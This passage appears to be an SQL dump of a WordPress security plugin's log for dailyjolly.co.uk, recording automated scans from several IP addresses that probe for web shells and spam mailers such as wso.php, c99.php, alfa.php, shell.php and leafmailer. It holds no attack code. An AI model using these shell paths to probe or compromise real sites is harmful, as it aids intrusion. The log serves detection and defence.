'13|0|0|0|www.dailyjolly.co.uk/wp-includes/customize/class-wp-customize-nav-menu.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369992.3147,55,'HrOM9kYUFENvz1xd03cAow7f','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/js/a.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369992.8268,55,'inBOFsdVq2CKPhXTGgHklDj4','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/alfa.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369993.1662,55,'Ifd1s5xzMFEhNYV9RZwmkrHj','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/pomo/css_.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369993.5277,55,'qjDi3P7tSbaCG5ukyBcnI12L','','19|0|0|0|www.dailyjolly.co.uk/wp-info.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369993.8933,55,'SdITRKyFtO3i9nmLUuJwcMX5','','19|0|0|0|www.dailyjolly.co.uk/wp-x.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369994.2359,55,'PEyr6znMmgUB7WkZ48G1aRcC','','19|0|0|0|www.dailyjolly.co.uk/wp.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369994.5507,55,'ZCXWrxt3zaMk87lvGLN1q65F','','19|0|0|0|www.dailyjolly.co.uk/wp_logx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369994.8687,100,'AwLbSpN25x06RKstTMXyi813','','13|0|0|0|www.dailyjolly.co.uk/wp_wrong_datlib.php',0,13,0),('167.172.248.229',2813130981,'',0,1674369995.2132,55,'HmcwAL5RMvNJp0ybK9E6ZnXj','','19|0|0|0|www.dailyjolly.co.uk/wpx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369995.5538,55,'nyUK6LPz4f5OZFsRW8v2obDu','','19|0|0|0|www.dailyjolly.co.uk/wso.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369995.8820,55,'wqBvCE47PoaGcfjrsOyHnpx3','','19|0|0|0|www.dailyjolly.co.uk/wxo.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369996.1918,55,'Lh6kASatKuU7bfYoCqwzNgMZ','','19|0|0|0|www.dailyjolly.co.uk/x.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369996.5133,55,'LphvVnG0QADfKj6tHUgCXWd5','','19|0|0|0|www.dailyjolly.co.uk/xl.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369996.8533,55,'sVoX0mfrp6NJtzGnPaWgDOjI','','19|0|0|0|www.dailyjolly.co.uk/xleet.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369997.1803,55,'jkid0aYUwX98e4mWqIAfPtrV','','19|0|0|0|www.dailyjolly.co.uk/xlt.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369997.5027,55,'8fvTOyCFburS7cEPXzqA6mlD','','19|0|0|0|www.dailyjolly.co.uk/xml.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369997.8492,55,'k5Lsod1XpEFxTutchRGzO8iK','','19|0|0|0|www.dailyjolly.co.uk/xmlrqc.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369998.1681,55,'Ri17d4bwLtvzFGKxVY63s0I9','','19|0|0|0|www.dailyjolly.co.uk/xwxx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369998.5698,55,'9zTEBVMFPpwYl01voSnDL6Ig','','19|0|0|0|www.dailyjolly.co.uk/XxX.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369998.8836,55,'uxvGinC1PN7hLr9HOpEtzAyW','','19|0|0|0|www.dailyjolly.co.uk/xx.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369999.2562,55,'ejgbiWIJGD9BMcUfqak3zONV','','19|0|0|0|www.dailyjolly.co.uk/wp-2018.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369999.5899,55,'Yw7mEOnSx34oyvKakZMcq9gW','','19|0|0|0|www.dailyjolly.co.uk/wp-2019.php',0,19,0),('167.172.248.229',2813130981,'',0,1674369999.9395,55,'y2dLIWY6Va3ZlTmuGz7Dt9k8','','19|0|0|0|www.dailyjolly.co.uk/wp-2020.php',0,19,0),('167.172.248.229',2813130981,'',0,1674370000.2587,55,'2yd3n0ERr9WjTsH6lhSXfaxc','','19|0|0|0|www.dailyjolly.co.uk/wp-2021.php',0,19,0),('167.172.248.229',2813130981,'',0,1674370000.5973,55,'aU3SsoXbYFDzMmpdQiEAInG9','','19|0|0|0|www.dailyjolly.co.uk/wp-2022.php',0,19,0),('167.172.248.229',2813130981,'',0,1674370000.9551,55,'tc6gUFBoa9YeKk1iWQlZX075','','19|0|0|0|www.dailyjolly.co.uk/wp-22.php',0,19,0),('167.172.248.229',2813130981,'',0,1674370001.2720,55,'mK2IVqJpSieusf6T0FXj7L14','','19|0|0|0|www.dailyjolly.co.uk/hax.php',0,19,0),('20.210.237.151',349367703,'',0,1674376029.1441,55,'XWFU8IQlGdVCEPZ1uyb2B9pr','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/db.php',0,19,0),('20.210.237.151',349367703,'',0,1674376030.1086,55,'TUZuNdfR3InrpYwGMA284XeW','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/seoplugins/mar.php',0,19,0),('20.210.237.151',349367703,'',0,1674376030.7921,55,'lIhvsHg5j6XKFPtqx4ukUf9Q','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/seotheme/mar.php',0,19,0),('20.210.237.151',349367703,'',0,1674376033.0540,55,'ZexESdcpmwlyWUToPtRC2uaB','','19|0|0|0|www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php',0,19,0),('20.210.237.151',349367703,'',0,1674376033.7733,55,'DYardu813bJl0qSyinQjKCgs','','19|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php',0,19,0),('20.210.237.151',349367703,'',0,1674376033.8219,10,'DYardu813bJl0qSyinQjKCgs','','707|0|0|0|www.dailyjolly.co.uk/wp-content/themes/alera/alpha.php',0,707,0),('20.210.237.151',349367703,'',0,1674376034.4880,100,'ytSf4hkYgiroEIPsC8dzwRaL','','13|0|0|0|www.dailyjolly.co.uk/wp-commentin.php',0,13,0),('20.210.237.151',349367703,'',0,1674376035.1773,100,'e9N1u3VWMBT5AJby2tijpRqr','','13|0|0|0|www.dailyjolly.co.uk/wp/wp-commentin.php',0,13,0),('20.210.237.151',349367703,'',0,1674376035.8432,100,'7TDIqLHtmXMjca6RFNfvhbC4','','13|0|0|0|www.dailyjolly.co.uk/wordpress/wp-commentin.php',0,13,0),('20.210.237.151',349367703,'',0,1674376036.4843,100,'IiEcegbtoMpUmSYyfzvR4qCa','','13|0|0|0|www.dailyjolly.co.uk/blog/wp-commentin.php',0,13,0),('20.210.237.151',349367703,'',0,1674376037.1492,100,'mS50U6yRPwXn3AJLse8N9xgT','','13|0|0|0|www.dailyjolly.co.uk/site/wp-commentin.php',0,13,0),('176.111.173.153',2960108953,'',0,1674377417.6931,55,'L4q8dJSl5AenCK1tDOu20oG3','','19|0|0|0|dailyjolly.co.uk/wp-plain.php',0,19,0),('176.111.173.153',2960108953,'',0,1674377417.9264,55,'FdUVu6T0b3JmykDRvhNIZfOW','','19|0|0|0|dailyjolly.co.uk/duepiqux.php',0,19,0),('40.113.104.238',678521070,'',0,1674386469.2189,55,'5V1pdZabhquRLrSoOX8HlPQM','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('40.113.104.238',678521070,'',0,1674386471.7861,55,'SCYoPr0z5TJ4dNuRcWD6BH9i','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('40.113.104.238',678521070,'',0,1674386474.5625,55,'paw4FWYqeMdnBHU1cZvu6rDO','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('40.113.104.238',678521070,'',0,1674386477.2743,55,'tnfKouazCIvG8qHWyb3EBAeD','','19|0|0|0|www.dailyjolly.co.uk/leafmailer.php',0,19,0),('40.113.104.238',678521070,'',0,1674386479.9494,55,'BiyNJl9WErXLz6MTkURoHCYD','','19|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,19,0),('40.113.104.238',678521070,'',0,1674386479.9930,10,'BiyNJl9WErXLz6MTkURoHCYD','','707|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,707,0),('40.113.104.238',678521070,'',0,1674386482.7993,100,'gN5Ot1RQk4bhFCZAMSEjvXIY','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/leaf.php',0,13,0),('40.113.104.238',678521070,'',0,1674386485.5289,100,'GSwfhgv6XP71Usoy2u5YLq8V','','13|0|0|0|www.dailyjolly.co.uk/wp-content/leafmailer2.8.php',0,13,0),('40.113.104.238',678521070,'',0,1674386488.3801,100,'AgiYJcbsXvKeTUQalEP3Z4wV','','13|0|0|0|www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php',0,13,0),('40.113.104.238',678521070,'',0,1674386491.6037,100,'qQMkVn2p6ubhayLdSCvX7Jfx','','13|0|0|0|www.dailyjolly.co.uk/mailer.php',0,13,0),('40.113.104.238',678521070,'',0,1674386494.4077,100,'OkiKdH2Wgm0qTzEM4R9bu1LB','','13|0|0|0|www.dailyjolly.co.uk/leaf-mailer.php',0,13,0),('40.113.104.238',678521070,'',0,1674386497.3503,100,'xhbVl67iQ10EwRgvusYtJqnC','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/leaf-mailer.php',0,13,0),('40.113.104.238',678521070,'',0,1674386500.0729,100,'ryBeAo0tf4XEw9R513ncSDTZ','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php',0,13,0),('40.113.104.238',678521070,'',0,1674386502.7771,100,'53F6bULVIRBvWoyh0cCqsQMk','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer.php',0,13,0),('40.113.104.238',678521070,'',0,1674386505.5574,100,'cUd3jsrQSLoHbtaqOnPz0WDv','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/leaf.php',0,13,0),('40.113.104.238',678521070,'',0,1674386508.3372,100,'yRG7kCesSpr3zVuaAdghtLOI','','13|0|0|0|www.dailyjolly.co.uk/wp-includes/lf.php',0,13,0),('40.113.104.238',678521070,'',0,1674386511.2563,100,'9A0zFvJqP6k4wt7Sh5dWKYBc','','13|0|0|0|www.dailyjolly.co.uk/.tmb/leaf.php',0,13,0),('40.113.104.238',678521070,'',0,1674386514.5123,100,'snTGtVuOYHxZLl1gX0wRcP6z','','13|0|0|0|www.dailyjolly.co.uk/alexus.php',0,13,0),('147.78.47.230',2471374822,'',0,1674393415.9108,55,'VSfEFs8Cle7m6nAkQNtyiocx','','19|0|0|0|www.dailyjolly.co.uk/wp-comments.php',0,19,0),('20.14.84.163',336483491,'',0,1674412020.5764,55,'QKB95G3wZXPSWq47f6vmeR8u','','19|0|0|0|www.dailyjolly.co.uk/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674412030.2414,55,'o6r5uw0JaeAmIHKnvRQVZi1h','','19|0|0|0|www.dailyjolly.co.uk/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674412037.0707,55,'CwtFjauDXgfiPJy0sdU62qTk','','19|0|0|0|www.dailyjolly.co.uk/lf.php',0,19,0),('20.14.84.163',336483491,'',0,1674412051.3814,55,'aBIYW0XyebpCD7NrKwx3G5Zg','','19|0|0|0|www.dailyjolly.co.uk/leafmailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674412062.5963,55,'urDVMZp9ejqzoIsfiFm8k34w','','19|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674412062.6680,10,'urDVMZp9ejqzoIsfiFm8k34w','','707|0|0|0|www.dailyjolly.co.uk/wp-conetnt/leaf.php',0,707,0),('20.14.84.163',336483491,'',0,1674412075.0823,55,'ZkbLaAVQ3XS1NncjWfvum5Be','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674412083.3335,55,'38eJiLctyoHNfzMxPsIphgOk','','19|0|0|0|www.dailyjolly.co.uk/wp-content/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674412104.3630,55,'2SvHgFAubGTaOQUsXPdcwLqk','','19|0|0|0|www.dailyjolly.co.uk/wp-admin/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674412120.7439,55,'TUSaNqcweRjrmLsvJPI36ZYB','','19|0|0|0|www.dailyjolly.co.uk/mailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674412151.1301,55,'SqOpcFhGk6eH1nUQdBa4vRim','','19|0|0|0|www.dailyjolly.co.uk/leaf-mailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674412195.4534,55,'WChlzuG5NmkTn0FsH2BpgQfO','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer2.8.php',0,19,0),('20.14.84.163',336483491,'',0,1674412206.2974,55,'XS31tcuoGyP76LNKpnWiFVr5','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leafmailer.php',0,19,0),('20.14.84.163',336483491,'',0,1674412215.8052,55,'kfFXW3OmCZEDQohHLVBgijcy','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/leaf.php',0,19,0),('20.14.84.163',336483491,'',0,1674412224.7036,55,'FI8eULtoAwEV9zgPHB3rpRyN','','19|0|0|0|www.dailyjolly.co.uk/wp-includes/lf.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412239.9597,55,'LBGbjKel4mdupcSC1YDogzXy','','19|0|0|0|dailyjolly.co.uk/1index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412246.1824,55,'rslwG8J4npx5geqT2c09BRUA','','19|0|0|0|dailyjolly.co.uk/11index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412255.7258,55,'2KozF6uPXR3vAdDVtnaiYHce','','19|0|0|0|dailyjolly.co.uk/2index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412263.9239,55,'lwZB2N94u8IR673v1MYTmbos','','19|0|0|0|dailyjolly.co.uk/3index.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412276.5772,55,'47S2dnPOLC9WNrzT6Jba8YG3','','19|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412276.6322,10,'47S2dnPOLC9WNrzT6Jba8YG3','','707|0|0|0|dailyjolly.co.uk/wp_wrong_datlib.php',0,707,0),('216.226.146.228',3638727396,'',0,1674412281.5386,100,'zAiofIWbGBMc1nhLPyN6Cd5K','','13|0|0|0|dailyjolly.co.uk/wp-adminincludesclass-wp-media-list-data.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412289.7613,100,'h4vOVB7SCjR3NabdUJ5sLpy1','','13|0|0|0|dailyjolly.co.uk/autoload_classmap.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412302.4123,100,'78w6zEI01DoUXBAn3qMaSHhK','','13|0|0|0|dailyjolly.co.uk/wso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412308.5412,100,'QW6umK0INGXkdPVlZE384ebf','','13|0|0|0|dailyjolly.co.uk/doc.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412317.1183,100,'ZgvdmbQleCGsqTUIjL7xN6S1','','13|0|0|0|dailyjolly.co.uk/stindex.php',0,13,0),('20.14.84.163',336483491,'',0,1674412322.9467,55,'KEgJqPXHp3RolCYZD4r0ft6L','','19|0|0|0|www.dailyjolly.co.uk/.tmb/leaf.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412324.1260,100,'WSUrEqOnX4LJ7xYQemcM3bH6','','13|0|0|0|dailyjolly.co.uk/alwso.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412330.9499,100,'DzQmPb2WrUuoMT3G1HC5nh8L','','13|0|0|0|dailyjolly.co.uk/ups.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412342.4264,100,'sFqUvhrgc5keSB4YCPlAHMQa','','13|0|0|0|dailyjolly.co.uk/media-admin.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412348.1705,100,'OTazpW3dAo8cnJwtfElVu1IZ','','13|0|0|0|dailyjolly.co.uk/sym.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412355.2609,100,'PmBiRULSgqtnGEefchQNYlDr','','13|0|0|0|dailyjolly.co.uk/sym403.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412359.5310,100,'1HpfqZbDE0IalmkgYsKd72oW','','13|0|0|0|dailyjolly.co.uk/fw.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412367.7030,100,'RJhfAOGTiDnClXQ7YSKE4cz3','','13|0|0|0|dailyjolly.co.uk/symlink.php',0,13,0),('20.14.84.163',336483491,'',0,1674412374.6008,55,'B4FzHVEIra9TNL0xu3evcqtP','','19|0|0|0|www.dailyjolly.co.uk/mailer2.8.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412374.7650,100,'aiRZ8N2EghYo9jqVu4HQJndf','','13|0|0|0|dailyjolly.co.uk/shell.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412381.4393,100,'6ilXGJdjRcsfugpHILSV32bE','','13|0|0|0|dailyjolly.co.uk/1.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412388.8092,100,'OWlQ2tGzqVoYw49bfc0AMeRX','','13|0|0|0|dailyjolly.co.uk/data.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412398.8222,100,'BrPIbFEg3xn9OkezWuHSpCZ0','','13|0|0|0|dailyjolly.co.uk/wp-blog.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412403.1718,100,'Ka8TIc3ZW9Rh4YwrniU5qfBx','','13|0|0|0|dailyjolly.co.uk/b.php',0,13,0),('20.14.84.163',336483491,'',0,1674412405.8608,55,'oXYCfFNOQjcPp2rBwhdx0H97','','19|0|0|0|www.dailyjolly.co.uk/1.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412409.3227,100,'2EZJrXdfuKSyOjY0PQFbzi56','','13|0|0|0|dailyjolly.co.uk/c.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412416.2762,100,'nlsvKbtZaDUV0qwpJfhRO9rd','','13|0|0|0|dailyjolly.co.uk/shx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412421.0946,100,'jSQuPazEZOX9UqKiJ8VRncIe','','13|0|0|0|dailyjolly.co.uk/alfa.php',0,13,0),('20.14.84.163',336483491,'',0,1674412424.2107,55,'LylXbY4gzZ50xhD8O7p6FeWQ','','19|0|0|0|www.dailyjolly.co.uk/2.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412429.5232,100,'fePWR52y7Q0K8tNcYxGSMki6','','13|0|0|0|dailyjolly.co.uk/a.php',0,13,0),('20.14.84.163',336483491,'',0,1674412433.4138,55,'MPC4iphDJ8yFYxI7R9ujXocL','','19|0|0|0|www.dailyjolly.co.uk/3.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412434.2160,100,'qisk5Cd7mV8NSoI9bHLTyXhP','','13|0|0|0|dailyjolly.co.uk/old-index.php',0,13,0),('20.14.84.163',336483491,'',0,1674412442.6459,55,'YnuwKPQEfxRAMGoOVg5ZtDcS','','19|0|0|0|www.dailyjolly.co.uk/m.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412442.7311,100,'UI53nMpFN6aXVB8exWA0GwLy','','13|0|0|0|dailyjolly.co.uk/FoxWSO.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412450.1467,100,'JI1s5vxfaOGeAzSLyH06ZRMi','','13|0|0|0|dailyjolly.co.uk/x.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412457.7361,100,'cYBt89Sw1lnWTo65fyHKbVXQ','','13|0|0|0|dailyjolly.co.uk/403.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412467.1418,100,'pV40EiQSnoltfAZCKqhd6ykj','','13|0|0|0|dailyjolly.co.uk/mini.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412473.1386,100,'i5DG2Yz0jeA1JFbOWrHSIUul','','13|0|0|0|dailyjolly.co.uk/imagesvuln.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412480.5114,100,'rL2C3Oc48U7DkaoYTstx5RjW','','13|0|0|0|dailyjolly.co.uk/edit-form.php',0,13,0),('20.14.84.163',336483491,'',0,1674412482.5414,55,'KAvjdm8p92CfO07PbZi3FGyM','','19|0|0|0|www.dailyjolly.co.uk/c.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412488.5142,100,'je0Xv6nsS7dr8lDuckOKEBmh','','13|0|0|0|dailyjolly.co.uk/wikindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412494.7797,100,'9qUSvnrFijBXozP5aDZyCG8x','','13|0|0|0|dailyjolly.co.uk/m.php',0,13,0),('20.14.84.163',336483491,'',0,1674412497.3918,55,'5x2dTbk03tXahnVWJcqrKCMu','','19|0|0|0|www.dailyjolly.co.uk/k.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412504.8001,100,'YAaCoHnJ5vwcXNW1xZtPh7Ij','','13|0|0|0|dailyjolly.co.uk/0byte.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412516.5633,100,'vFTengfAyhPlujZN5dSY2XWH','','13|0|0|0|dailyjolly.co.uk/xx.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412525.6471,100,'TJPxqok2jyBO0XWV5dnaemZb','','13|0|0|0|dailyjolly.co.uk/new-index.php',0,13,0),('20.14.84.163',336483491,'',0,1674412525.7068,55,'96Qum3gWLpADjshnkK8iFEyx','','19|0|0|0|www.dailyjolly.co.uk/a.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412533.0088,100,'Cc4FdMBAquyQ3LYWatswf2hl','','13|0|0|0|dailyjolly.co.uk/wp.php',0,13,0),('20.14.84.163',336483491,'',0,1674412533.0386,55,'Qpohly4V8NSk2F1qHRsj7xnu','','19|0|0|0|www.dailyjolly.co.uk/28.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412538.8379,100,'QCDVmBzqM8xyZHLdIvfAj90W','','13|0|0|0|dailyjolly.co.uk/wp-wso.php',0,13,0),('20.14.84.163',336483491,'',0,1674412541.0883,55,'4u1lIXbRsJSjy5C2B9W8G7qz','','19|0|0|0|www.dailyjolly.co.uk/.Wp-maiiler.phP',0,19,0),('216.226.146.228',3638727396,'',0,1674412546.4064,100,'zwSNMerd1U2W8biLvtDoqlBQ','','13|0|0|0|dailyjolly.co.uk/qindex.php',0,13,0),('20.14.84.163',336483491,'',0,1674412549.0187,55,'A1iYa73kGTogp48BLQlrRI25','','19|0|0|0|www.dailyjolly.co.uk/owl.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412552.2417,100,'x1TPkYrqZyJHet6vLDzoaf4b','','13|0|0|0|dailyjolly.co.uk/priv8.php',0,13,0),('20.14.84.163',336483491,'',0,1674412558.0419,55,'degLZ7T632KI8FcORhCraf14','','19|0|0|0|www.dailyjolly.co.uk/wp-content/owl.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412559.5188,100,'oEziDGhCaJsePHbIX7RMYmlp','','13|0|0|0|dailyjolly.co.uk/minimo.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412567.7280,100,'XRkymlzsOpZeC5bY87BqPtNf','','13|0|0|0|dailyjolly.co.uk/xleet.php',0,13,0),('20.14.84.163',336483491,'',0,1674412569.5626,55,'Z3ow9DLgcWKJhT4S6QpyAPGk','','19|0|0|0|www.dailyjolly.co.uk/wp-maiiler.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412573.5145,100,'1pDMSjGcmX8nrZtdxA5RwiKv','','13|0|0|0|dailyjolly.co.uk/V3.php',0,13,0),('20.14.84.163',336483491,'',0,1674412577.8456,55,'0MvZ2AyU4ETDdNqlVPkRKLax','','19|0|0|0|www.dailyjolly.co.uk/send.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412583.0231,100,'yiBYvRnkVGmxoNqrXSge2b45','','13|0|0|0|dailyjolly.co.uk/V5.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412591.8513,100,'8DLwnZU93hbWHNpqe0BPGCtO','','13|0|0|0|dailyjolly.co.uk/404.php',0,13,0),('20.14.84.163',336483491,'',0,1674412596.9222,55,'0vpWMbf8U5wrONJEdyxakqV7','','19|0|0|0|www.dailyjolly.co.uk/.Wp-maiiler.phP',0,19,0),('216.226.146.228',3638727396,'',0,1674412599.8492,100,'dlwv5tIC4pVWX1nDiNoJUq7r','','13|0|0|0|dailyjolly.co.uk/up.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412604.4868,100,'YceNT5WMD6gpGkVqrXHFuva3','','13|0|0|0|dailyjolly.co.uk/www.php',0,13,0),('20.14.84.163',336483491,'',0,1674412611.0690,55,'fJ6a2CjqdtlrONWbn3w8vK74','','19|0|0|0|www.dailyjolly.co.uk/alexus.php',0,19,0),('216.226.146.228',3638727396,'',0,1674412614.6266,100,'0LZQTihrNI8tdCmbDaqlFpfE','','13|0|0|0|dailyjolly.co.uk/100.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412623.5251,100,'LetCTZGsmQYrFiNPjM4JOhxv','','13|0|0|0|dailyjolly.co.uk/777.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412631.6165,100,'zEGfev1qQb8tk6sn7WhV4NuS','','13|0|0|0|dailyjolly.co.uk/defau1t.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412639.2670,100,'Z0WwBYjCSOFPnXAt36DdRU1r','','13|0|0|0|dailyjolly.co.uk/f.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412646.4452,100,'Uwtf9X8ZCmWuDK0LRF5Vg46x','','13|0|0|0|dailyjolly.co.uk/xox.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412654.0564,100,'qJInatwdp3y7Vzbs9ZSK8HC1','','13|0|0|0|dailyjolly.co.uk/o.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412662.3544,100,'Y2tL1E4ocNDSMOaGW5bmfK6z','','13|0|0|0|dailyjolly.co.uk/new.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412668.8200,100,'meFHzrCRG4yuEhpWkjIQ9158','','13|0|0|0|dailyjolly.co.uk/sindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412676.2471,100,'PMA8XheRgasDKBLH2cn5G0bj','','13|0|0|0|dailyjolly.co.uk/baindex.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412683.5216,100,'pQjnIOoLrK9DmxP6FugU8ZXh','','13|0|0|0|dailyjolly.co.uk/wi.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412688.7965,100,'XJz5MtDhFqcnGf9QKs1N8pgk','','13|0|0|0|dailyjolly.co.uk/mar.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412695.0635,100,'ObMSuFIXc1gosxjiAaZPvqtN','','13|0|0|0|dailyjolly.co.uk/root.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412700.6136,100,'yIGfZoD8xFMPNzle7ErRsbTL','','13|0|0|0|dailyjolly.co.uk/nee.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412706.4043,100,'6ayqpoDlQctZj5HLGxhO90Ud','','13|0|0|0|dailyjolly.co.uk/v.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412712.8932,100,'ysxKBroNPgvfQG1XnFYLiOh7','','13|0|0|0|dailyjolly.co.uk/z.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412725.9817,100,'2I0ODXti81mdJAK56Sx3bV7v','','13|0|0|0|dailyjolly.co.uk/g.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412736.0100,100,'gKMkHO3PDzCV9oseIdLbTfwl','','13|0|0|0|dailyjolly.co.uk/c99.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412746.8584,100,'REZIyQ7kFqJSB60wf9nTzYLe','','13|0|0|0|dailyjolly.co.uk/w.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412751.3757,100,'XkZCGV5faegcS1vHdj6DFQ9s','','13|0|0|0|dailyjolly.co.uk/ws.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412758.6994,100,'CK2yNSBefi91hDFAdMko0v84','','13|0|0|0|dailyjolly.co.uk/2.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412765.9872,100,'gZfFnNQ7vORhSxIE4LACwcDy','','13|0|0|0|dailyjolly.co.uk/lol.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412772.4038,100,'LO6wAfp1IKkNcCMgZztVvPDd','','13|0|0|0|dailyjolly.co.uk/87.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412777.6634,100,'VG1eUXMzROZ3dAoBmL9I5Pjc','','13|0|0|0|dailyjolly.co.uk/7yn.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412781.4140,100,'MxB1Sso0F7bDkmIHzeh28dlQ','','13|0|0|0|dailyjolly.co.uk/haxor.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412785.8987,100,'kRcoAIwr4S5OKp1nVEZ7vgjW','','13|0|0|0|dailyjolly.co.uk/13.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412790.1885,100,'oZ0NL1yxabYl9pUTeF3XWPMO','','13|0|0|0|dailyjolly.co.uk/e.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412796.3311,100,'qyia0YskVO468TrczSe2XvA9','','13|0|0|0|dailyjolly.co.uk/r.php',0,13,0),('216.226.146.228',3638727396,'',0,1674412803.4933,100,'xYoRPQSWXKUvj3srm6TyuaAi','','13|0|0|0|dailyjolly.co.uk/t.php',0,13,0),('216.226.